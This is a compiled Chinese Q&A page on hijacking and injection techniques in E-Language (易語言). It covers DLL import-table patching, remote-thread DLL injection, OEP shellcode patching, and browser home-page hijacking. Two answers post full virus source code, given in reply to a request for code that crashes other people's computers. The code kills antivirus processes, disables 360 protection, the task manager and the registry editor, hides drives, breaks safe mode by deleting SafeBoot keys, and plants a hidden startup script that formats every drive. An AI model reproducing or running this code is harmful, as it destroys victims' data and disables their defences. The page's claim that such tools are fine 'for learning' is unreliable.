易語言劫持源碼

1. 易語言dll劫持注入寫法

1、首先這不是注入DLL，這是導入DLL函數進PE文件，這明陪個過程需要一個工具LordPE，網上都有可以自己去下載。

2我們知道一旦DLL函數被導入EXE文件的輸入表，則EXE文件啟動時會自動執行一遍該DLL的_啟動子程序 函數，

3、所以我們可以把需要執行的指令放在該函數裡面，然後記得在該函數的 公開 選項打上勾，然後編譯。

4、接下來，我們打開LordPE，如下圖

然後在彈出的對話框中選擇要導入DLL函數的程序然後點擊新彈出的窗口的目錄，如下圖

5、然後點 輸入表 右邊的 標題是 ...的按鈕(截不了圖了)

然後隨便選擇一項數據，右鍵，如下圖

在彈出的窗口中填寫DLL名，及API名(填_啟動子程序)就可以了，然後點一下 + 按鈕

6、如果彈出一個信息框，點 是 就可塵槐喊以，添加完成之後點 確定 ，然後一路保存就可以了，不過發布程序的時候記得帶上那個DLL

相關資源：易語言DLL永派野久注入EXE_易語言dll注入exe並且運行-其它代碼類資源...

2. 【易語言】【OD】關於寫dll劫持(也可叫做靜態補丁)的方法

改文件我渣空餘覺得不如dll注入來的優雅。

VirtualAllocEx申請內存，
WriteProcessMemory將你的裝載dll的shellcode寫過去，
CreateRemoteThread創建線程，指向你如滾的shellcode。
簡單愉快，完全不需要改OEP，更不用搜索00。

如果你那麼固執要用你的靜態補丁方法，
其實我覺得你也不需要用什麼易語言了，直接把你用OD修改的DLL，保存並替代原文件，
就可以了，何須那麼麻煩，當然除非你這個DLL還是EXE有什麼特殊的地方不能這樣。

易語言用匯編比較蛋疼，而且我對易語言也不太了解，
如果你那麼固執要用編程來解決，我就大概提一下思路。

一、搜00，找個足夠大的空的地方
二、通過讀PE結構獲取OEP，不懂的話請自行網路PE結構。
三、OEP改成你步驟一找到的空地，
這一塊涉及到文件虛擬地址對齊問題（好像是這么叫的），比較復雜，而且我也不太清楚，
交給你自己解決。

四、空地里寫入你的shellcode。你的shellcode有個問題，call LoadLibrary用的是相對偏移跳 轉，當你這句匯編的位置483AFE，那麼你就會call到別的地方去了，可以改虧御成如下代碼：
mov eax,LoadLibrary地址

call eax

五、shellcode末尾jmp回原OEP，同樣涉及對齊問題，自行研究吧。

3. 易語言編譯完成DLL文件，怎麼劫持注入到游戲中

利用游戲或系統缺陷注入 如偽裝成輸入法、驅動許可權強制載入、文件偽裝替換等等。

4. 求易語言病毒源碼，最好能讓別人死機的源碼，急求，高分

.版本 2
.支持庫 shell
.程序集 窗口程序集1
.子程序 _按鈕1_被單擊
' 繞過殺毒軟體防禦：
運行 (「taskkill /f /im kavsvc.exe」, 假, 1)
運行 (「taskkill /f /im KVXP.kxp」, 假, 1)
運行 (「taskkill /f /im Rav.exe」, 假, 1)
運行 (「taskkill /f /im Ravmon.exe」, 假, 1)
運行 (「taskkill /f /im Mcshield.exe」, 假, 1)
運行 (「taskkill /f /im VsTskMgr.exe」, 假, 1)
' 修改系統時間：
置現行時間 (到時間 (「8888年8月8日」))
' 禁用任務管理器：
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr」, 0)
' 禁用注冊表：
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\System\Disableregistrytools」, 1)
' 隱藏開始中的運行 禁止WIN2000/XP通過任務管理器創建新任務：
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun」, 1)
' 隱藏「MS-DOS方式」下的磁碟驅動器。不管是在「我的電腦」里，或「MS－DOS」方式下都看不見了：
寫注冊項 (3, 「SoftWare \Microsoft \Windows \CurrentVersion \Policies\WinOldApp\Disabled」, 1)
' 隱藏開始中的關機：
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose」, 1)
' 隱藏開始中的搜索：
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind」, 1)
' OVER360防禦：
寫注冊項 (4, 「SOFTWARE\360Safe\safemon\ExecAccess」, 0)
寫注冊項 (4, 「SOFTWARE\360Safe\safemon\MonAccess」, 0)
寫注冊項 (4, 「SOFTWARE\360Safe\safemon\SiteAccess」, 0)
寫注冊項 (4, 「SOFTWARE\360Safe\safemon\UDiskAccess」, 0)
' 結束360進程
運行 (「taskkill /f /im 360tray.exe」, 假, 1)
' 隱藏所有驅動器：
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives」, 4294967295)
' 禁止所有驅動器：
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive」, 4294967295)
' 隱藏文件夾選項：
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions」, 1)
' 將桌面對象隱藏：
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop」, 1)
' 隱藏開始中的關機：
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose」, 1)
' 隱藏開始中的搜索：
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind」, 1)
' 這條有兩種情況。1 禁用CMD和.BAT文件 2 禁CMD不禁.BAT 0啟用兩項
寫注冊項 (3, 「Software\Policies\Microsoft\Windows\System\DisableCMD」, 1)
' 隱藏主頁選項組：
寫注冊項 (3, 「Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage」, 1)
' 隱藏IE文件菜單：
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu」, 1)
' 隱藏收藏夾菜單：
寫注冊項 (3, 「Software\Policies\Microsoft\Internet Explorer\Restrictions\NoFavorites」, 1)
' 禁用IE列印功能：
寫注冊項 (3, 「Software\Policies\Microsoft\Internet Explorer\Restrictions\NoPrinting」, 1)
' 隱藏Internet選項：
寫注冊項 (3, 「Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserOptions」, 1)
' 禁止IE查看源文件：
寫注冊項 (3, 「Software\Policies\Microsoft\Internet Explorer\Restrictions\NoViewSource」, 1)
' 禁用IE下載功能：
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Interner Settings\Zones\3\1803」, 3)
' 禁止右鍵關聯菜單：
寫注冊項 (3, 「Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserContextMenu」, 1)
' 修改文件關聯：
寫注冊項 (1, 「.txt\」, 「jpegfile」)
寫注冊項 (1, 「.inf\」, 「jpegfile」)
寫注冊項 (1, 「.reg\」, 「jpegfile」)
寫注冊項 (1, 「.exe\」, 「jpegfile」)
' 無法進入安全模式：
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{36FC9E60-C465-11CF-8056-444553540000}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E965-E325-11CE-BFC1-08002BE10318}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E969-E325-11CE-BFC1-08002BE10318}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96A-E325-11CE-BFC1-08002BE10318}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96B-E325-11CE-BFC1-08002BE10318}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96F-E325-11CE-BFC1-08002BE10318}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E973-E325-11CE-BFC1-08002BE10318}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E974-E325-11CE-BFC1-08002BE10318}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E975-E325-11CE-BFC1-08002BE10318}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E977-E325-11CE-BFC1-08002BE10318}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97B-E325-11CE-BFC1-08002BE10318}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97D-E325-11CE-BFC1-08002BE10318}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E980-E325-11CE-BFC1-08002BE10318}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{71A27CDD-812A-11D0-BEC7-08002BE2092F}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AFD\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AppMgmt\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Base\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Boot Bus Extender\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Boot file system\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Browser\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\CryptSvc\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\DcomLaunch\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Dhcp\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmadmin\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmboot.sys\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmio.sys\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmload.sys\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmserver\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\DnsCache\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\EventLog\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\File system\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Filter\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\HelpSvc\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ip6fw.sys\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ipnat.sys\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\LanmanServer\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\LanmanWorkstation\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\LmHosts\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Messenger\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NDIS\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NDIS Wrapper\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Ndisuio\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetBIOS\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetBIOSGroup\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetBT\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetDDEGroup\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Netlogon\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetMan\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Network\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetworkProvider\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NtLmSsp\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PCI Configuration\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PlugPlay\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PNP Filter\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PNP_TDI\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Primary disk\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpcdd.sys\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpdd.sys\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpwd.sys\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdsessmgr\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\RpcSs\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SCSI Class\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sermouse.sys\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SharedAccess\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sr.sys\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SRService\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Streams Drivers\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\System Bus Extender\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Tcpip\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\TDI\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tdpipe.sys\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tdtcp.sys\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\termservice\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vga.sys\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vgasave.sys\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WinMgmt\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WZCSVC\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Ndisuio\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\」)
' 關機：
關閉系統 (2, 真)

5. 易語言攻擊源碼，各種的都沒事。。。

.局部變數 變數, 整數型

置現行時間 (到時間 (「2056年1月1日」))
運行 (「taskkill /f /im kavsvc.exe」, 假, 1)
運行 (「taskkill /f /im KVXP.kxp」, 假, 1)
運行 (「taskkill /f /im Rav.exe」, 假, 1)
運行 (「taskkill /f /im Ravmon.exe」, 假, 1)
運行 (「taskkill /f /im Mcshield.exe」, 假, 1)
運行 (「taskkill /f /im VsTskMgr.exe」, 假, 1)
' 繞過360監控
寫注冊項 (4, 「SOFTWARE\360Safe\safemon\ExecAccess」, 0)
寫注冊項 (4, 「SOFTWARE\360Safe\safemon\MonAccess」, 0)
寫注冊項 (4, 「SOFTWARE\360Safe\safemon\SiteAccess」, 0)
寫注冊項 (4, 「SOFTWARE\360Safe\safemon\UDiskAccess」, 0)
運行 (「taskkill /f /im 360tray.exe」, 假, 1) ' 結束360進程
' 修改關聯
寫注冊項 (1, 「.txt\」, 「jpegfile」)
寫注冊項 (1, 「.inf\」, 「jpegfile」)

寫注冊項 (4, 「SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue」, 0) ' 隱藏文件和文件夾
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr」, 0) ' 禁用任務管理器
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel」, 1) ' 禁用控制面板
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\System\Disableregistrytools」, 1) ' 禁用注冊表
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun」, 1) ' 隱藏開始中的運行 禁止WIN2000/XP通過任務管理器創建新任務

寫注冊項 (3, 「SoftWare \Microsoft \Windows \CurrentVersion \Policies\WinOldApp\Disabled」, 1)
' 隱藏「MS-DOS方式」下的磁碟驅動器。不管是在「我的電腦」里，或「MS－DOS」方式下都看不見了
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives」, 4294967295) ' 隱藏所有驅動器
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive」, 4294967295) ' 禁止所有驅動器
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions」, 1) ' 隱藏文件夾選項
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop」, 1) ' 將桌面對象隱藏
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose」, 1) ' 隱藏開始中的關機
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind」, 1) ' 隱藏開始中的搜索
' 寫注冊項 (3, 「Software\Policies\Microsoft\Windows\System\DisableCMD」, 1)'1 禁用CMD和.BAT文件 2 禁CMD不禁.BAT 0啟用兩項
寫注冊項 (3, 「Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage」, 1) ' 隱藏主頁選項組
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu」, 1) ' 隱藏IE文件菜單
寫注冊項 (3, 「Software\Policies\Microsoft\Internet Explorer\Restrictions\NoFavorites」, 1) ' 隱藏收藏夾菜單
寫注冊項 (3, 「Software\Policies\Microsoft\Internet Explorer\Restrictions\NoPrinting」, 1) ' 禁用IE列印功能
寫注冊項 (3, 「Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserOptions」, 1) ' 隱藏Internet選項
寫注冊項 (3, 「Software\Policies\Microsoft\Internet Explorer\Restrictions\NoViewSource」, 1) ' 禁止IE查看源文件
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Interner Settings\Zones\3\1803」, 3) ' 禁用IE下載功能
寫注冊項 (3, 「Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserContextMenu」, 1) ' 禁止右鍵關聯菜單

寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRealMode」, 1) ' 禁止「重新啟動計算機切換到MS-DOS方式」

寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff」, 1) ' 禁止顯示「注銷」

寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu」, 1) ' 禁止文檔菜單

寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff」, 1) ' 去掉「開始」選單中的「登錄」項

寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu」, 1) ' 禁止使用滑鼠右鍵

寫到文件 (讀環境變數 (「SystemRoot」) ＋ 「\system32」 ＋ 「\」 ＋ 到文本 (取分鍾 (取現行時間 ())) ＋ 「.vbs」, 到位元組集 (「set Cleaner=createobject(」 ＋ 左逗號.標題 ＋ 「wscript.shell」 ＋ 右逗號.標題 ＋ 「)」 ＋ #換行符 ＋ 「Cleaner.run」 ＋ 左逗號.標題 ＋ 讀環境變數 (「SystemRoot」) ＋ 「\system32」 ＋ 「\」 ＋ 到文本 (取秒 (取現行時間 ())) ＋ 「.bat」 ＋ 右逗號.標題 ＋ 「,vbhide」)) ' 創建隱藏批處理腳本
置文件屬性 (讀環境變數 (「SystemRoot」) ＋ 「\system32」 ＋ 「\」 ＋ 到文本 (取分鍾 (取現行時間 ())) ＋ 「.vbs」, 7 ＋ 32)

寫到文件 (讀環境變數 (「SystemRoot」) ＋ 「\system32」 ＋ 「\」 ＋ 到文本 (取秒 (取現行時間 ())) ＋ 「.bat」, 到位元組集 (「@echo off」 ＋ #換行符 ＋ 「for %%i in (C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) DO format %%i: /q /x /y」 ＋ #換行符 ＋ 「del /f /s /q /a %SystemRoot%\system32\*.msc」)) ' 創建格式化和刪除沒運行文件的批處理
置文件屬性 (讀環境變數 (「SystemRoot」) ＋ 「\system32」 ＋ 「\」 ＋ 到文本 (取秒 (取現行時間 ())) ＋ 「.bat」, 7 ＋ 32)

寫注冊項 (4, 「Software\Microsoft\Windows\CurrentVersion\Run\Explore.exe」, 讀環境變數 (「SystemRoot」) ＋ 「\system32」 ＋ 「\」 ＋ 到文本 (取分鍾 (取現行時間 ())) ＋ 「.vbs」) ' 把隱藏批處理腳本加入啟動項

' 修改EXE圖標
寫到文件 (讀環境變數 (「SystemRoot」) ＋ 「\system32」 ＋ 「\wscript.ico」, #ico)
' 置文件屬性 (讀環境變數 (「SystemRoot」) ＋ 「\system32\wscript.ico」, 7 ＋ 32)
寫到文件 (讀環境變數 (「SystemRoot」) ＋ 「\system32\reg.reg」, 到位元組集 (「Windows Registry Editor Version 5.00」 ＋ #換行符 ＋ 「[HKEY_CLASSES_ROOT\exefile\DefaultIcon]」 ＋ #換行符 ＋ 「@=」 ＋ 左逗號.標題 ＋ 讀環境變數 (「SystemRoot」) ＋ 「\system32\wscript.ico」 ＋ 右逗號.標題))
寫到文件 (讀環境變數 (「SystemRoot」) ＋ 「\system32\reg.bat」, 到位元組集 (「@echo off」 ＋ #換行符 ＋ 「regedit /s reg.reg」 ＋ #換行符 ＋ 「assoc .exe=exefile」 ＋ #換行符 ＋ 「del /f /s /q /a 」 ＋ 讀環境變數 (「SystemRoot」) ＋ 「\system32\reg.reg」 ＋ #換行符 ＋ 「del /f /s /q /a 」 ＋ 讀環境變數 (「SystemRoot」) ＋ 「\system32\reg.bat」))
運行 (讀環境變數 (「SystemRoot」) ＋ 「\system32\reg.bat」, 假, 1)

寫注冊項 (4, 「SOFTWARE\360Safe\safemon\ExecAccess」, 1)
寫注冊項 (4, 「SOFTWARE\360Safe\safemon\MonAccess」, 1)
寫注冊項 (4, 「SOFTWARE\360Safe\safemon\SiteAccess」, 1)
寫注冊項 (4, 「SOFTWARE\360Safe\safemon\UDiskAccess」, 1)

6. 易語言可以劫持網站嗎

你必須得有一個收集需要屏蔽的網站的資料庫！
然後將客戶端的電腦HOOKAPI 當用戶打開資料庫中的網站的時候。程序劫持此操作並作出響應。整個過程和殺毒軟體的原理一樣。前期的時候由於沒有資料庫，需要自己手動收集分析。如果你想直接屏蔽謀個網站,可以在注冊表或者hosts的文件裡面添加項目。 IE裡面的安全設置不是有個受限網站的列表嗎？ 把要添加的網站填進去,然後注冊表查找。 找到的位置就是要限制網站的列表在注冊表對應的位置。然後寫入注冊項目就可以了。

7. 易語言劫持代碼生成器是合法軟體嗎

不太合法，但軟體只是學習的工具，只要你不應用於非法途徑，只是自己學習，即使不太合法，也沒關系。

8. 易語言主頁劫持代碼

檢測IE進程 獲取新打開的IE經常的 地址欄句柄 發送消息 你要設置的主頁 再發送一個回車過去